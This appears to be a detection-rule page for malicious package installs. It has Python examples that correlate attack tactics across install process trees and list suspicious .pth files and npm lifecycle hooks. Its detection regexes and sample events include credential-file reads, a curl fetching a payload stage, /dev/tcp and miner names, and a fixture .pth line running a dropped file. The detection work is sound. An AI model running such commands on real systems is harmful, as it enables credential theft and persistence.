Malicious package installation
What happened
A package manager installed a package whose install-time code exhibited malicious behaviour.
Goal
Detect packages whose installation exhibits multiple attack tactics, across npm, pip, gem, composer, cargo, and other package managers.
Strategy
This rule monitors package installations performed by npm, yarn, pnpm, bun, pip, uv, pipx, poetry, conda, gem, bundler, composer, and cargo. Most of these package managers run code supplied by the package at install time: npm lifecycle scripts (preinstall, install, postinstall), setup.py execution for Python source distributions, native extension compilation, and similar mechanisms, all running with the privileges of the user performing the install. Any one of these actions is expected on its own (a native build spawns a compiler, a postinstall script spawns a shell), so the rule alerts only when multiple attack tactics are observed in the processes spawned during a single installation. That combination indicates a supply chain attack or malware executing through the install hook rather than a normal build step.
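The following is an added illustration of the multi-tactic correlation described above; it is not Datadog's rule implementation. The event schema, the tactic names, the regex heuristics and the sample process events are all constructed for the example. It walks each process back to the nearest package-manager ancestor, tags its command line with zero or more tactics, and alerts only when one installation accumulates at least two distinct tactics:

```python
"""Correlate attack tactics across the process tree of one package installation.

Added illustration only; not Datadog's rule logic. The event schema, tactic
names, regexes and sample events below are constructed for this example.
"""
import re
from collections import defaultdict

# Process names treated as package managers (the page's list plus common aliases).
PACKAGE_MANAGERS = {"npm", "yarn", "pnpm", "bun", "pip", "pip3", "uv", "pipx",
                    "poetry", "conda", "gem", "bundle", "composer", "cargo"}

# Hypothetical per-tactic heuristics applied to the command line of each child process.
TACTIC_PATTERNS = {
    "credential_access": re.compile(r"\.aws/credentials|\.ssh/id_|\.npmrc|\.docker/config\.json"),
    "command_and_control": re.compile(r"\b(?:curl|wget)\b.*https?://|/dev/tcp/"),
    "execution": re.compile(r"\b(?:sh|bash|zsh)\s+-c\b|base64\s+(?:-d|--decode)"),
    "persistence": re.compile(r"site-packages/\S+\.pth|crontab|\.bashrc"),
    "resource_hijacking": re.compile(r"\b(?:xmrig|minerd)\b|stratum\+tcp"),
}


def find_install_root(events, pid):
    """Walk parent links from pid upward; return the pid of the nearest
    package-manager ancestor, or None if the process is not under one."""
    by_pid = {e["pid"]: e for e in events}
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])          # guards against a malformed, cyclic ppid chain
        if cur["comm"] in PACKAGE_MANAGERS:
            return cur["pid"]
        cur = by_pid.get(cur["ppid"])
    return None


def classify(cmdline):
    """Return the set of tactic names whose heuristic matches this command line."""
    return {name for name, pat in TACTIC_PATTERNS.items() if pat.search(cmdline)}


def correlate(events, min_tactics=2):
    """Group tactic hits by the package-manager process that spawned them.

    Returns {install_pid: sorted tactic list} only for installations that reached
    min_tactics distinct tactics; a lone curl or shell spawn never alerts.
    """
    tactics_by_install = defaultdict(set)
    for e in events:
        if e["comm"] in PACKAGE_MANAGERS:
            continue                   # the manager's own command line is not evidence
        root = find_install_root(events, e["pid"])
        if root is None:
            continue                   # not a descendant of any package manager
        tactics_by_install[root] |= classify(e["cmdline"])
    return {pid: sorted(t) for pid, t in tactics_by_install.items()
            if len(t) >= min_tactics}


# Constructed process events (pid, ppid, comm, cmdline); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "comm": "bash",    "cmdline": "bash"},
    {"pid": 101, "ppid": 100, "comm": "npm",     "cmdline": "npm install some-helper-lib"},
    {"pid": 102, "ppid": 101, "comm": "sh",      "cmdline": "sh -c node postinstall.js"},
    {"pid": 103, "ppid": 102, "comm": "node",    "cmdline": "node postinstall.js"},
    {"pid": 104, "ppid": 103, "comm": "curl",    "cmdline": "curl -s https://203.0.113.7/stage -o /tmp/.x"},
    {"pid": 105, "ppid": 103, "comm": "cat",     "cmdline": "cat /home/dev/.aws/credentials"},
    {"pid": 200, "ppid": 1,   "comm": "pip",     "cmdline": "pip install some-native-lib"},
    {"pid": 201, "ppid": 200, "comm": "python3", "cmdline": "python3 setup.py bdist_wheel"},
    {"pid": 202, "ppid": 201, "comm": "gcc",     "cmdline": "gcc -O2 -shared ext.c -o ext.so"},
    {"pid": 300, "ppid": 1,   "comm": "curl",    "cmdline": "curl https://example.com/"},
]

if __name__ == "__main__":
    for pid, tactics in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT install pid={pid} tactics={tactics}")
```

Run against the sample events, only the npm install (pid 101) alerts: its postinstall chain shows execution, command and control, and credential access. The pip install that compiles a native extension produces no tactic at all, and the stray curl outside any package manager is ignored because it has no package-manager ancestor. Real telemetry would need the process tree from the agent rather than a static list, and the heuristics would be far richer, but the correlation structure is the point.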
Triage and response
- Review the installation details in the alert and identify the package, its version, the package manager that triggered the alert, and the user and host on which the install ran.
- Investigate the tactics observed during installation to understand the nature of the malicious activity (e.g., credential theft, reverse shell, crypto mining).
- Check whether the package version has been flagged in security advisories (npm advisories, PyPI, RubyGems, etc.). A package can be malicious before any advisory exists, so the absence of an advisory does not clear it.
- Remove the malicious package and any artifacts it created, such as .pth files in site-packages for pip or compiled extensions for gem, and rotate any credentials the install could have read on the host (cloud credentials, SSH keys, registry tokens).
- Follow your organization’s internal processes for investigating and remediating compromised systems.
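As an added triage aid (not a Datadog tool), the script below enumerates two of the install-time artifacts mentioned above: .pth files in a site-packages directory whose lines begin with `import`, which CPython executes at every interpreter start, and installed npm packages that declare preinstall, install or postinstall lifecycle scripts. The fixture tree it builds is constructed for the example; the package names in it are hypothetical.

```python
"""Enumerate install-time hooks and persistence artifacts left by packages.

Added triage example; not a Datadog tool. Layouts are the standard ones
(site-packages/*.pth, node_modules/<pkg>/package.json); the fixture tree
written by build_sample_tree() is constructed for this example.
"""
import json
import tempfile
from pathlib import Path

# npm runs these scripts for dependencies during install.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def suspicious_pth_lines(site_packages):
    """Return (path, line) pairs for .pth lines that execute code.

    CPython's site module exec()s any .pth line starting with 'import ' or
    'import\\t'; every other non-comment line is treated as a sys.path entry.
    """
    hits = []
    for pth in sorted(Path(site_packages).glob("*.pth")):
        for line in pth.read_text(errors="replace").splitlines():
            if line.startswith(("import ", "import\t")):
                hits.append((str(pth), line))
    return hits


def npm_lifecycle_scripts(node_modules):
    """Return {package_name: {hook: command}} for installed packages that
    declare install-time lifecycle scripts (top-level and @scoped packages)."""
    root = Path(node_modules)
    manifests = sorted(list(root.glob("*/package.json")) + list(root.glob("@*/*/package.json")))
    out = {}
    for manifest in manifests:
        try:
            data = json.loads(manifest.read_text())
        except (ValueError, OSError):
            continue                   # unreadable or non-JSON manifest: skip, do not crash
        scripts = data.get("scripts") or {}
        hooks = {h: scripts[h] for h in NPM_INSTALL_HOOKS if h in scripts}
        if hooks:
            out[data.get("name", manifest.parent.name)] = hooks
    return out


def build_sample_tree():
    """Write a constructed fixture tree (not real packages) and return its root."""
    root = Path(tempfile.mkdtemp(prefix="pkg-triage-"))
    sp = root / "site-packages"
    sp.mkdir()
    # Benign: a plain path entry, the common case for .pth files.
    (sp / "easy-install.pth").write_text("./some_pkg-1.0-py3.11.egg\n")
    # Hypothetical persistence artifact: runs on every interpreter start.
    (sp / "evil_hook.pth").write_text("import os; os.system('/tmp/.x')\n")
    nm = root / "node_modules"
    benign = nm / "left-pad"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({"name": "left-pad", "version": "1.3.0"}))
    hooked = nm / "@acme" / "telemetry-helper"
    hooked.mkdir(parents=True)
    (hooked / "package.json").write_text(json.dumps({
        "name": "@acme/telemetry-helper",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
    }))
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for path, line in suspicious_pth_lines(root / "site-packages"):
        print(f"code-executing .pth line: {path}: {line}")
    for name, hooks in npm_lifecycle_scripts(root / "node_modules").items():
        print(f"install hooks in {name}: {hooks}")
```

Point the two functions at the real site-packages directory (`python -c "import site; print(site.getsitepackages())"`) and the project's node_modules when triaging; a hook or an import-style .pth line is not malicious by itself (setuptools ships one), but every hit should be explainable by a package you expected.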